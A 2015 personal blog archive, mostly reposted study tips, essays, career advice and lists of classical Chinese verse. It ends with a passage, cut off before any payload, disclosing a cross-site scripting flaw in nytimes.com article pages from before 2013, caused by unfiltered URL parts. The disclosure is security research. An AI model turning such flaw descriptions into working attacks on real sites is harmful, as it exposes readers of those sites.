Essaybeans - Record Everything in Youth (blog by essayjeans, http://www.blogger.com/profile/11019920613685827608)<br />
<br />
Five Effective Study Methods - Method Matters More Than Effort (posted 2015-11-20)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-nG4RqhLiHRA/Vk8P29XE_3I/AAAAAAAAAe0/xrX9HlaSBgg/s1600/study.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="265" src="http://3.bp.blogspot.com/-nG4RqhLiHRA/Vk8P29XE_3I/AAAAAAAAAe0/xrX9HlaSBgg/s400/study.jpg" width="400" /></a></div>
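1. Goal-Based Learning<br />
The mastery-of-objectives learning method was advocated by the American psychologist Bloom. Bloom held that, given the best teaching and enough time, most learners can achieve excellent results.<br />
Teaching content is made up of many knowledge points. Points form lines, lines build relatively independent bodies of knowledge, and these make up an interconnected knowledge network. Being clear about goals therefore means, when starting a new lesson, knowing where its knowledge points sit in that network, and, when reviewing, grasping the details from the big picture and paying attention to how the points connect. It also means knowing how difficult each point is and the level at which it should be mastered, namely recall, comprehension, application, analysis, synthesis and evaluation. Most important is to be clear about the key learning goals, that is, the key points of knowledge. Having a goal strengthens attention and motivation: for the sake of this goal I must study well.<br />
Clear learning goals are thus the precondition of goal-based learning. Its core is forming self-disciplined habits of self-testing, self-correction and self-remediation: write formative test questions that match the teaching objectives, test yourself, give yourself timely feedback and evaluation, and correct and remedy promptly.<br />
<br />
Learning goals differ from life goals: they are more concrete and can be achieved in a short time. They let us enjoy the pleasure of success fairly easily and build our confidence. Goal-based learning is therefore also one of the main strategies of success education. At the same time, achieving learning goals is the start of achieving life goals; only by combining large and small, near and distant goals organically can wasted effort be avoided.<br />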
<br />
<br />
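2. Question-Based Learning<br />
Reading with questions in mind helps concentrate attention and gives a clear purpose. This is both a requirement of intentional learning and a necessary condition of discovery learning. Psychologists divide attention into involuntary and voluntary attention. Voluntary attention requires a conscious purpose set in advance and, when necessary, an effort of will to actively attend to a particular thing. It shows the agency and initiative of mental activity. Question-based learning emphasizes voluntary attention to information relevant to solving a problem, giving study a clear direction and so raising efficiency.<br />
<br />
Question-based learning asks us, before reading, to look first at the study questions at the end of the text and to think as we read. It also asks us to look for questions while previewing, so that we can concentrate in class when the teacher explains them. Finally, when practicing, work hard at solving problems one by one and do not be intimidated by them; the process of solving problems is the process of your progress.<br />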
<br />
<br />
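3. Contradiction-Based (Comparative) Learning<br />
The viewpoint of contradiction is the philosophical basis for the comparative learning method, because to compare we must first see whether the two sides have similar, close or opposite attributes; this is comparability. The greatest advantages of the comparative method are: (1) comparative memorization lightens the burden on memory, so more can be memorized in the same time; (2) comparative study helps distinguish easily confused concepts and principles and deepens understanding; (3) comparative study requires us to classify knowledge by its different characteristics, forming procedural knowledge that is easy to retrieve, which helps recall and retrieval and also flexible application.<br />
<br />
Across secondary-school textbooks, comparable knowledge is everywhere. In politics: rights and duties, democracy and the legal system, matter and consciousness, peace and development. In Chinese language: complex and simple sentences, self-answered questions and rhetorical questions, metaphor and metonymy, narration and argument, content words and function words. In mathematics: decimals and fractions, exponents and logarithms, odd and even functions, parallel and perpendicular. In chemistry: metals and non-metals, crystals and non-crystals, combination and decomposition, oxidation and reduction, acids and salts. Comparative learning can be used within one subject and also across subjects: sentence analysis from Chinese class can be used to analyze political concepts; when studying national liberation movements in modern history, the basic political viewpoints on nationality can be applied; when studying natural science, one can recall the biographies of scientists in the Chinese textbook, or draw on the relevant principles of materialist dialectics.<br />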
<br />
<br />
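4. Connection-Based Learning<br />
Materialist dialectics holds that everything in the world exists in relations of mutual influence and mutual constraint with the things around it. Scientific knowledge is a correct reflection of objective things, so universal connections likewise exist between pieces of knowledge. Applying the viewpoint of connection to study helps us understand scientific knowledge and achieves twice the result with half the effort.<br />
<br />
According to the psychological theory of transfer, similarity between pieces of knowledge favors transfer, and transfer is one expression of connection; but connection-based learning should not be understood as merely a form of transfer. Transfer is in a sense spontaneous, whereas learning by the connection method is deliberate and fully expresses the learner's initiative. Its first premise is a firm belief that knowledge points must be connected, so that one purposefully recalls and searches the information in one's mind to find the inner connections. Of course, the breadth and depth of what one already knows directly affects how many connections can be built. But through dialectical thinking, and through leafing through books, looking things up, or even new study, we can build new connections, store them in our minds, and make the knowledge network grow day by day. This is something transfer cannot do.<br />
<br />
When learning something new, think of what you already know and of things you have experienced yourself; do not follow authority blindly, and overcome fixed habits of thought. Make abstract knowledge concrete and bring the right brain into play. For example, the Xinhai Revolution took place in 1911, the Second Revolution in 1913, the National Protection War in 1915 and the Constitutional Protection War in 1917. These four historical events are each two years apart, so if you remember the logical order of these historical events and know the year of any one of them, you can work out the years of the other three by association. This is the associative memory method.<br />
<br />
The way to read is first to know the outer shell, and then also to know the marrow within; only then is it good. - Zhu Xi<br />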
<br />
<br />
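5. Inductive Learning<br />
Inductive learning means using inductive thinking to memorize, understand and apply the characteristics, central ideas and nature of knowledge. As a study method it values inductive thinking, but it is not the same as inductive thinking itself, and it also takes analysis as its premise.<br />
<br />
Inductive learning thus means being good at summarizing the characteristics and nature of things and grasping the essence of sentences and paragraphs, and, on that basis, searching out knowledge that is the same, similar or opposite and putting it together to memorize and understand. Its advantage is that it speeds up memorization and understanding.<br />
<br />
Research must appropriate the material in detail, analyze its different forms of development, and trace out the inner connection of these forms. - Marx<br />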
<br />
<br />
<br />
Reposted from Tetraph:<br />
<a data-mce-href="http://www.tetraph.com/blog/study/study-method/" href="http://www.tetraph.com/blog/study/study-method/">http://www.tetraph.com/blog/study/study-method/</a><br />
<br />
Return of the Heart - All Our Lives, We Are on the Road Home (posted 2015-11-20)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-4IdnJEv4hcg/Vk79vS88n2I/AAAAAAAAAeM/-U3ZV8SJVc0/s1600/cropped-road-home1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="221" src="http://1.bp.blogspot.com/-4IdnJEv4hcg/Vk79vS88n2I/AAAAAAAAAeM/-U3ZV8SJVc0/s400/cropped-road-home1.jpg" width="400" /></a></div>
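All our lives, we are on the road home.<br />
<br />
Going home is a knot in my heart that can never be untied. Wherever I am, my heart always faces toward home; it blossoms silently in a corner, and where the lights grow dim it reflects the splendor of home.<br />
<br />
Home is also such a heart-aching word. Only after leaving do we understand how reluctant we are to part from it. Even outstretched wings tremble a little on hearing it; however vigorous the body and broad the shoulders, before home we are fragile and powerless.<br />
<br />
Deep in the night, fireworks rise and lights shine. How many people have already left home, how many are about to leave, and how many want to go back. How many, in a strange place, look up without thinking, see fireworks bursting in brilliance, and feel a sense of loss well up; yet for the sake of so-called dreams, how many are helpless, with a hundred feelings mingled. The lights at home may not be so beautiful, nor the fireworks so bright, but the heart can still feel the warmth of home: warm as a mother's hands, plain as a father's teaching, gentle as a relative's advice. It flows in your blood and is rooted in your marrow. At every moment it reminds you: let your heart go home.<br />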
<br />
<br />
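The public-service advertisements about going home have moved us to tears many times, and they woke my long-sleeping heart. "While your parents are alive, do not travel far." Only today have I fully understood. This saying has been repeated for two thousand years, but how many people grasp its true meaning? How many can live by it? At least I did not, not before. I cannot help regretting myself and regretting those days. I once wanted only to fly, to get far from home, the farther the better; to throw off everything and escape all ties, for the sake of so-called dreams. My poor parents were placed beneath that "so-called", yet they had not half a word of complaint and still quietly supported and encouraged you. You do not see the bitterness and tears behind it; you see only the bright lights and the wine, only money and power, only fame and envy! In your eyes there is only your so-called success, only your moment of applause and laughter. You did not see your parents' loneliness. They need nothing but your company and your phone calls! They only want a whole you, a healthy and happy you. Sometimes they just want to see you once, to hear your voice. If you cannot give them even that, how can you talk of success?<br />
<br />
<br />
I owe them too much, more than a lifetime can repay. It is a sin, an enormous sin, too great to record. We are too stingy, so stingy that at home we never said a word of thanks and never spent a little more time with them. And we? We are busy, really busy. Busy with what? Sleeping? Playing on the computer? On the phone? Going to parties? Yes, quite busy. How much time have we given them? Two meals a day?<br />
<br />
<br />
Guilt is the monologue of a failure, but it is also the reproach of conscience. The moment the ticket was in my hand, I knew my guilt toward my parents could only deepen and never be made up. I have even come to dislike traveling far. How many times have I asked myself: going on like this, my chances to be with my parents can really be counted on my fingers. I believe many who live far away go home twice a year; by that count, can our visits home still exceed a hundred?<br />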
<br />
<br />
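We never forget that we are Chinese, and of all virtues filial piety comes first. If I cannot do even the most basic thing, I am a person who has achieved nothing, an incomplete person. Every time I leave home I avoid my mother's eyes, which hold disappointment, expectation and resolve all at once. Thinking it over, I have not fulfilled even my most basic duty, so what else is there to speak of? Home is forever the harbor of our dreams; a person with no home in the heart is forever a failure.<br />
<br />
<br />
However long it has been, it always appears in dreams; however far away, we will not stop running toward home. In the future of the future, I will no longer be lost, no longer pursue things without purpose, no longer take journeys that lead nowhere. Home is always where I come to rest. Let the heart go home, back to my parents' side, to repay the debt I owe.<br />
<br />
<br />
<br />
All our lives, we are on the road home.<br />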
<br />
<br />
<br />
<br />
<br />
<br />
Reposted from Diebiyi (蝶比翼美文):<br />
<a data-mce-href="http://diebiyi.com/articles/essay/home-back/" href="http://diebiyi.com/articles/essay/home-back/">http://diebiyi.com/articles/essay/home-back/</a><br />
<br />
Five Important Work Suggestion - Very Useful for Success (posted 2015-10-19)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-MOAn6MKpvK8/Vk8EtGjkJSI/AAAAAAAAAec/BEM_xU-N1ik/s1600/work.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="221" src="http://3.bp.blogspot.com/-MOAn6MKpvK8/Vk8EtGjkJSI/AAAAAAAAAec/BEM_xU-N1ik/s400/work.jpg" width="400" /></a></div>
This post is in partnership with Time. The article below was originally published at Time.com<br />
<br />
With
so much career advice floating around the interwebs, some of it is
bound to be poor. Luckily we here at Levo don’t just trust the
haphazardly doled-out opinions of self-appointed “leadership experts”
and other dubious characters. We go straight to the top—men and women
who have worked their way to massive career success — and ask them. What
strategies actually worked for them? Which career buzz phrases should
be ignored completely? Here are a few pieces of career advice that you
should never follow.<br />
<br />
1. “Always have a five-year plan.”<br />
Haven’t
you heard? Five-year plans are out, pivoting is in. Having tangible
goals is awesome and necessary, but trying to plan out the next five
years of your life is neither. The best opportunities are often those
that you don’t see coming. Being too stuck to your “five-year plan”
inhibits you from taking opportunities as they arise, and pivoting in
new directions.<br />
<br />
2. “Don’t be a job hopper.”<br />
There
are worse things to be. Namely, the quiet loyal workhorse who never
leaves or makes the money she deserves. It’s a new economy people, job
hopping is becoming the norm. These days, employees who stay in
companies for longer than two years earn 50% less over their lifetimes.
So yes, be gracious and respectful to each and every one of your
employers, but certainly don’t stay in a position for fear of being
labeled “a job hopper.”<br />
<br />
3. “Follow the money.” / “Just do what you love and the money will follow.”<br />
Equally
bad advice, from opposite ends of the spectrum. Following the money
with complete disregard for your interests is a surefire path toward a
soul-sucking career doing something you hate. It may not even be the
best financial move in the long term. On the other side of that coin,
doing what you love with the expectation that financial success will
miraculously follow is naive and ridiculous. As Kate White always says,
think about where your interests and talents intersect with the greatest
potential for financial success, and head toward those points of
intersection.<br />
<br />
4. “Don’t be too grabby. Let your work speak for itself.”<br />
This
is the kind of advice your Middle Eastern grandfather who owned a small
business 40 years ago might give you (not from personal experience or
anything). Even if it means well, it is just not true. Remember that
episode of New Girl? Jess wants to be vice principal of her school: “I’m
just hoping, you know in a few years, I’ll have enough experience that
Dr. Foster will consider me for Vice Principal.” Coach asks, “Why don’t
you just ask for it?” Jess says, “You can’t just ask for a promotion,
you know, you have to earn the promotion with years of hard work.” Coach
laughs. Please, don’t be Jess.<br />
<br />
5. “Don’t waste time applying to jobs you know you won’t get.”<br />
We
just published a great piece from the Personal Branding Blog that
addresses this very topic. Just because you think a particular job is a
reach or you’re not the ideal fit, that doesn’t mean you shouldn’t
apply. Within limits of course—don’t start applying for wedding
photographer assistant positions if you want to be a pharmacist (unless
you’ve always cultivated a secret passion for photography of course).
Every job you apply to is an opportunity to tighten up your resume, hone
your interview skills, and build confidence, which is never a waste of
time.<br />
<br />
<br />
Article From InZeed:<br />
<a data-mce-href="http://www.inzeed.com/kaleidoscope/life/work-useful-suggestion/" href="http://www.inzeed.com/kaleidoscope/life/work-useful-suggestion/">http://www.inzeed.com/kaleidoscope/life/work-useful-suggestion/</a><br />
<br />
Half a Day of This Floating Life, the Smoke and Fire of the Mortal World; One Pure Thought, and the Blaze Becomes a Pool (posted 2015-09-17)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-NpwzlhThhBc/VeQ7RDQ4kcI/AAAAAAAAAdE/4e-QvZ_fnwI/s1600/BeautifulNature3-610x320_diebiyi.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="208" src="http://2.bp.blogspot.com/-NpwzlhThhBc/VeQ7RDQ4kcI/AAAAAAAAAdE/4e-QvZ_fnwI/s400/BeautifulNature3-610x320_diebiyi.jpg" width="400" /></a></div>
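"Half a life adrift, each time the rain beating on the homebound boat." Half a day of this floating life, the smoke and fire of the mortal world; they say drinking poison does not quench thirst, yet in the end it is a cup of clear tea that washes the dust from the heart, a string plucked on the heart, the mountain mist still like the vapor above a teacup. Who is the shadow that someone parted from three lifetimes ago, the old dream and lingering air redeemed for two strings of coins; who still sings a drunken elegy and pours a shallow cup of fickleness, a pot of clear wine enough to drink and dream the hours away.<br />
<br />
Brewing tea with bitter snow, I passed the end of the world in peace. Many people and things were reborn, and I think I too will forget the crow that circled several times over the ark of the last day and flew past without a trace; but the lion said, if you love me, let the whole world know. Love is a bout of hives; let me wash off the powder once more and wait until a thousand sails have passed. With this parting may both hearts be at ease, and each find new joy. When the sun rises, look in every direction: fated, countless stars. As Eason Chan sings in "Bitter Melon": when you drain your glass and lift your chopsticks again, suddenly look at each other and smile; some bleak late-autumn night, all at once it becomes clear, and the yellow leaves crumble and fall.<br />
<br />
Time is short, and the ends of the earth are far. In the end there will surely be other waters to take the place of the three thousand. Tonight, please take good care of yourself, to be worthy of this half a lifetime of wandering, three thousand rounds of drunken laughter, parted on the two banks of the river, forgetting each other in the wide world. Once this cup of strong liquor is down, the grief of parting lies shattered on the ground, and there is no need for you to sing a farewell song on purpose to ferry it across. The smell of tobacco, the wind will thin it away.<br />
<br />
The wheat fields have ripened several times. Let me burn incense and grieve quietly, with a grateful heart, praying for blessings.<br />
<br />
The Book of Songs says: the first month, the air gathers; the second month, water and grain; the third month, camel clouds; the fourth month, rent silk; the fifth month, lined robes; the sixth month, lotus in splendor; the seventh month, orchid oars; the eighth month, poetry and Zen; the ninth month, the drifting raft; the tenth month, the maiden's grace; the eleventh month, returning home in one's robes; the twelfth month, the traveler in wind and snow. At the bridgehead in the third month, where a sudden light rain falls and peach blossom and spring willow brush the face, is there a good man, his clothes among the clouds? The fourth month's rent silk has rent my thoughts; the flowers on the path have faded, so will you come slowly home?<br />
<br />
Someone said that every meeting in this world is a reunion after long separation. I also remember that on a certain day of a certain month of a certain year, Xiaobei said: I can keep you, and I can also set you free.<br />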
<br />
<br />
<br />
<br />
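A wish: in the fleeting light of this floating world, cherish things and love people. One pure thought, and the blaze becomes a pool.<br />
<br />
Inch by inch the cloud-patterns do not make a text. If it is grieving over spring and mourning autumn, writing drunk all the way, weeping and singing all the way, tearing the spirit apart, in the end one forgets even Cold Mountain. Poet, can the countless mist-hung willows of the mortal world in your mountain-high pack bear the weight of this jar of drunken dreaming?<br />
<br />
Mist and water stretch far away, a cup of thin wine; the twelfth month's traveler in wind and snow. The wind blows in the same direction and with the same force as on that same day of that same month of that same year, yet nothing is as it was. I think I am waiting for an old friend. He has not come yet; perhaps he is on the way. I have made the tea and I wait. That is enough.<br />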
<br />
<br />
<br />
<br />
<br />
Reposted from Diebiyi (蝶比翼美文):<br />
<a href="http://diebiyi.com/articles/essay/shishi/">http://diebiyi.com/articles/essay/shishi/</a><br />
<br />
Youth - Time of Beautiful Emotion (posted 2015-08-31)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-JDmiVuzGUH0/VeQx2tAod6I/AAAAAAAABVg/dTuO18YYP44/s1600/marguerite-729510_640_inzeed.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="260" src="http://2.bp.blogspot.com/-JDmiVuzGUH0/VeQx2tAod6I/AAAAAAAABVg/dTuO18YYP44/s400/marguerite-729510_640_inzeed.jpg" width="400" /></a></div>
Youth
is not a time of life; it is a state of mind; it is not a matter of
rosy cheeks, red lips and supple knees; it is a matter of the will, a
quality of the imagination, a vigor of the emotions; it is the freshness
of the deep springs of life.<br />
<br />
<br />
Youth means a
temperamental predominance of courage over timidity, of the appetite for
adventure over the love of ease. This often exists in a man of 60 more
than a boy of 20. Nobody grows old merely by a number of years. We grow
old by deserting our ideals.<br />
<br />
<br />
Years may wrinkle the
skin, but to give up enthusiasm wrinkles the soul. Worry, fear,
self-distrust bows the heart and turns the spirit back to dust.<br />
<br />
<br />
Whether
60 or 16, there is in every human being’s heart the lure of wonders,
the unfailing appetite for what’s next and the joy of the game of
living. In the center of your heart and my heart, there is a wireless
station; so long as it receives messages of beauty, hope, courage and
power from man and from the infinite, so long as you are young.<br />
<br />
<br />
When
your aerials are down, and your spirit is covered with snows of
cynicism and the ice of pessimism, then you’ve grown old, even at 20;
but as long as your aerials are up, to catch waves of optimism, there’s
hope you may die young at 80.<br />
<br />
<br />
<br />
From:<br /> <a data-mce-href="http://www.inzeed.com/kaleidoscope/life/youth/" href="http://www.inzeed.com/kaleidoscope/life/youth/">http://www.inzeed.com/kaleidoscope/life/youth/</a><br />
<br />
On Mountains: Lines of Verse Describing Mountains - Classic Old Texts That Mention Mountains (posted 2015-07-13)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-yGxUMEQsVwg/VaN6BxXNi-I/AAAAAAAAAZg/Pga9DntfZu0/s1600/7040469-lake-mountains-woods.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="250" src="http://4.bp.blogspot.com/-yGxUMEQsVwg/VaN6BxXNi-I/AAAAAAAAAZg/Pga9DntfZu0/s400/7040469-lake-mountains-woods.jpg" width="400" /></a></div>
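1. Over a thousand mountains no bird flies; on ten thousand paths no human track remains.<br /> (Liu Zongyuan, "River Snow")<br />
2. The white sun sinks behind the mountains; the Yellow River flows into the sea.<br /> (Wang Zhihuan, "Climbing Stork Tower")<br />
3. One day I shall climb to the very summit and see all other mountains dwarfed in a single glance.<br /> (Du Fu, "Gazing at the Peak")<br />
4. The state is broken, but mountains and rivers remain; spring in the city, and grass and trees grow deep.<br /> (Du Fu, "Spring View")<br />
5. On the empty mountain no one is seen; only the sound of voices is heard.<br /> (Wang Wei, "Deer Enclosure")<br />
<br />
6. The bright moon rises over the Tian Shan, amid a vast sea of cloud.<br /> (Li Bai, "Moon over the Mountain Pass")<br />
7. We look at each other and never tire, only Jingting Mountain and I.<br /> (Li Bai, "Sitting Alone at Jingting Mountain")<br />
8. I plant beans below the southern hill; the weeds are thick and the bean shoots sparse.<br /> (Tao Yuanming, "Returning to Live in the Country")<br />
9. Looking northwest toward Chang'an, alas, countless mountains. The green hills cannot block it; in the end it flows on east.<br /> (Xin Qiji, "Pusaman: Written on a Wall at Zaokou, Jiangxi")<br />
10. I cannot know the true face of Mount Lu, only because I am within the mountain itself.<br /> (Su Shi, "Written on the Wall of West Forest Temple")<br />
<br />
11. The mountain light delights the nature of birds; the pool's reflections empty the human heart.<br /> (Chang Jian, "Written at the Meditation Hall Behind Broken Mountain Temple")<br />
12. The evening breeze brushes the willows, the flute's notes fade; the setting sun, mountains beyond mountains.<br /> (Li Shutong, "Farewell")<br />
13. Endless tears for mountains and rivers; who says heaven and earth are wide?<br /> (Xia Wanchun, "Leaving Yunjian")<br />
14. The traveler's road runs beyond the green hills; the boat moves on before the green water.<br /> (Wang Wan, "Mooring Below Beigu Mountain")<br />
15. On Feilai Mountain stands a pagoda a thousand xun high; I hear that at cockcrow one can see the sun rise.<br /> (Wang Anshi, "Climbing Feilai Peak")<br />
<br />
16. Mountains upon mountains, stream after stream, I doubt there is a road; then shaded willows, bright flowers, and another village.<br /> (Lu You, "Visiting a Village West of the Mountain")<br />
17. Seven or eight stars beyond the sky; two or three drops of rain before the hill.<br /> (Xin Qiji, "Xijiangyue: Traveling at Night on the Yellow Sand Road")<br />
18. The mountain turns, the road bends, and you are out of sight; on the snow only the tracks of your horse remain.<br /> (Cen Shen, "Song of White Snow: Seeing Off Secretary Wu on His Return to the Capital")<br />
19. On both banks the gibbons cry without cease; the light boat has already passed ten thousand folds of mountains.<br /> (Li Bai, "Leaving Baidi City at Dawn")<br />
20. If only the Flying General of Dragon City were here, no Hu horses would be let across the Yin Mountains.<br /> (Wang Changling, "On the Frontier")<br />
<br />
21. The Yellow River climbs far up among the white clouds; a lone fortress amid mountains ten thousand ren high.<br /> (Wang Zhihuan, "Liangzhou Song")<br />
22. Picking chrysanthemums by the eastern fence, at ease I see the southern hills.<br /> (Tao Yuanming, "Drinking Wine")<br />
23. From afar I gaze on Dongting's hills and water: a green snail shell on a plate of white silver.<br /> (Liu Yuxi, "Gazing at Dongting")<br />
24. Long clouds over Qinghai darken the snowy mountains; from a lone fortress one gazes far toward Jade Gate Pass.<br /> (Wang Changling, "Army Life")<br />
25. The hundred rivers boil over, the mountain peaks crumble and fall. High valleys become banks; deep valleys become hills.<br /> (Book of Songs)<br />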
<br />
<br />
<br />
Reposted from InZeed:<br /> <a data-mce-href="http://www.inzeed.com/kaleidoscope/essays/mountain/" href="http://www.inzeed.com/kaleidoscope/essays/mountain/">http://www.inzeed.com/kaleidoscope/essays/mountain/</a><br />
<br />
Lines of Verse About the Sea - The Sea Takes In a Hundred Rivers; Its Capacity Makes It Great (posted 2015-07-13)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-Tw2gi2QU-CY/VaN0rDxyErI/AAAAAAAAAZQ/iV7xBMKaWHs/s1600/boat_sea_beach-normal.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="300" src="http://2.bp.blogspot.com/-Tw2gi2QU-CY/VaN0rDxyErI/AAAAAAAAAZQ/iV7xBMKaWHs/s400/boat_sea_beach-normal.jpg" width="400" /></a></div>
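1. The white sun sinks behind the mountains; the Yellow River flows into the sea. - Wang Zhihuan, "Climbing Stork Tower"<br />
2. The hundred rivers run east to the sea; when will they ever return west? - Yuefu, "Long Song"<br />
3. A time will come to ride the wind and cleave the waves; I will hoist my cloud-white sail and cross the blue sea. - Li Bai, "Hard Is the Road"<br />
4. The spring river's tide runs level with the sea; over the sea the bright moon rises with the tide. - Zhang Ruoxu, "Spring River, Flowers, Moon, Night"<br />
5. In the great desert a lone column of smoke rises straight; over the long river the setting sun is round. - Wang Wei, "On a Mission to the Frontier"<br />
<br />
<br />
6. East I come to Jieshi to view the blue sea. How the waters roll; the hilly islands stand tall. - Cao Cao, "Viewing the Blue Sea"<br />
7. Floating against the sky, the blue sea is far; leaving this world, the boat of the Dharma is light. - Qian Qi, "Seeing Off a Monk Returning to Japan"<br />
8. Looking down, Qi and Lu vanish; gazing east, the sea is like a cup. - Li Mengyang, "Mount Tai"<br />
9. With a true friend within the four seas, the ends of the earth are like next door. - Wang Bo, "Seeing Off Vice-Prefect Du to His Post in Shuzhou"<br />
10. The sun rises from the sea while night lingers; spring on the river enters the old year. - Wang Wan, "Mooring Below Beigu Mountain"<br />
<br />
<br />
11. Over the sea the bright moon rises; at the ends of the earth we share this moment. - Zhang Jiuling, "Gazing at the Moon and Thinking of the Past"<br />
12. When no wind blows on the sea, the waves are calm and slow. - Bai Juyi, "On a Screen Painted with the Sea"<br />
13. The vast sea of sand is crisscrossed with ice a hundred zhang deep; gloomy clouds hang frozen over ten thousand li. - Cen Shen, "Song of White Snow: Seeing Off Secretary Wu on His Return to the Capital"<br />
14. Do you not see the waters of the Yellow River come down from heaven, rushing to the sea, never to return? - Li Bai, "Bring in the Wine"<br />
15. Do you not see Zouma River running by the edge of the Sea of Snow, the flat sands stretching yellow into the sky? - Cen Shen, "Song of Zouma River: Seeing Off General Feng on His Western Campaign"<br />
<br />
<br />
16. In its beak it carries small stones from the mountain; in its heart it hopes to level the waves of the sea. - Han Yu, "Jingwei Fills the Sea"<br />
17. From the tower one watches the sun over the blue sea; the gate faces the tide of the Zhe River. - Song Zhiwen, "Lingyin Temple"<br />
18. The boundless Eastern Sea, waves joining the sky; at the sky's edge the great moon, its light full and round. - Huang Zunxian, "Song Written While Watching the Moon Aboard Ship on the Pacific, Night of the Fifteenth of the Eighth Month"<br />
19. The river of thirty thousand li runs east into the sea; the peak of five thousand ren rises to touch the sky. - Lu You, "Feelings on Going Out the Fence Gate to Meet the Cool at Dawn on an Autumn Night"<br />
20. Hills and waters ring the city, swelling in spring; the river's waves enter the sea, joining the tide at night. - Chen Zilan, "Poem on Enbo Bridge"<br />
<br />
<br />
21. From here the little boat departs; to river and sea I entrust the rest of my life. - Su Shi, "Linjiangxian"<br />
22. One rain sweeps across and spans two continents; waves scour heaven and earth into the eastward flow. Yet the men of mark that remain cannot be washed away, and, bearing wind and thunder, set out once more on a far journey. - Liang Qichao, "Rain on the Pacific"<br />
23. The moon descends, a mirror flying through the sky; clouds rise and build towers over the sea. - Li Bai, "Farewell at Jingmen Ferry"<br />
24. Having once seen the blue sea, no other water is worth the name; apart from Mount Wu, no clouds are clouds. - Yuan Zhen, "Thoughts of Parting"<br />
25. How do the people who boil the sea make a living? The wives have no silkworms to weave from, the husbands no fields to plough. Their sources of food and clothing are all too meager; once the salt is boiled in the pans, it goes to pay your levies. - Liu Yong, "Song of the Sea-Boilers"<br />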
<br />
<br />
<br />
<br />
Reposted from Tetraph:<br /> <a data-mce-href="http://www.tetraph.com/blog/articles/sea/" href="http://www.tetraph.com/blog/articles/sea/">http://www.tetraph.com/blog/articles/sea/</a><br />
<br />
New York Times nytimes.com Page Design XSS Vulnerability (Almost all Article Pages Before 2013 are Affected) (posted 2015-06-20)<br />
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">The New York Times Old Articles Can Be Exploited by XSS Attacks (Almost all Article Pages Before 2013 Are Affected)</span></b></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Domain:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">http://www.nytimes.com/</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">"The New York Times (NYT) is an American daily newspaper, founded and continuously published in New York City since September 18, 1851, by the New York Times Company. It has won 114 Pulitzer Prizes, more than any other news organization. The paper's print version has the largest circulation of any metropolitan newspaper in the United States, and the second-largest circulation overall, behind The Wall Street Journal. It is ranked 39th in the world by circulation. Following industry trends, its weekday circulation has fallen to fewer than one million daily since 1990. Nicknamed for years as "The Gray Lady", The New York Times is long regarded within the industry as a national "newspaper of record". It is owned by The New York Times Company. Arthur Ochs Sulzberger, Jr., (whose family (Ochs-Sulzberger) has controlled the paper for five generations, since 1896), is both the paper's publisher and the company's chairman. Its international version, formerly the International Herald Tribune, is now called the International New York Times. The paper's motto, "All the News That's Fit to Print", appears in the upper left-hand corner of the front page." (Wikipedia)</span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1) Vulnerability Description:</span></b><br />
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><span style="background-color: white; line-height: 19.6000003814697px; text-align: justify;"><span style="font-family: Arial, Helvetica, sans-serif;">The New York Times website has a security problem: attackers can target its users through XSS (cross-site scripting) bugs. </span></span><br />
<span style="background-color: white; line-height: 19.6000003814697px; text-align: justify;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span><span style="background-color: white; line-height: 19.6000003814697px; text-align: justify;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The flaw is in how the New York Times site handles its URLs. Nytimes (short for New York Times) uses part of the requested URL to construct its pages. However, it seems that before 2013 Nytimes did not filter the content used for this construction at all.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Because of Nytimes’s page design, almost all URLs before 2013 are affected (all article pages). In fact, every article page that contains a “PRINT” button, “SINGLE PAGE” button, “Page *” button or “NEXT PAGE” button is affected.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Nytimes has used a different mechanism since 2013: it decodes the URLs sent to its server. This makes the mechanism much safer now.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">However, all URLs before 2013 still use the old mechanism. This means almost all article pages before 2013 are still vulnerable to XSS attacks. I guess the reason Nytimes does not filter the older URLs is cost. It costs too much (money &amp; human capital) to change the database of all previously posted articles.</span><br />
<div class="separator" style="clear: both;">
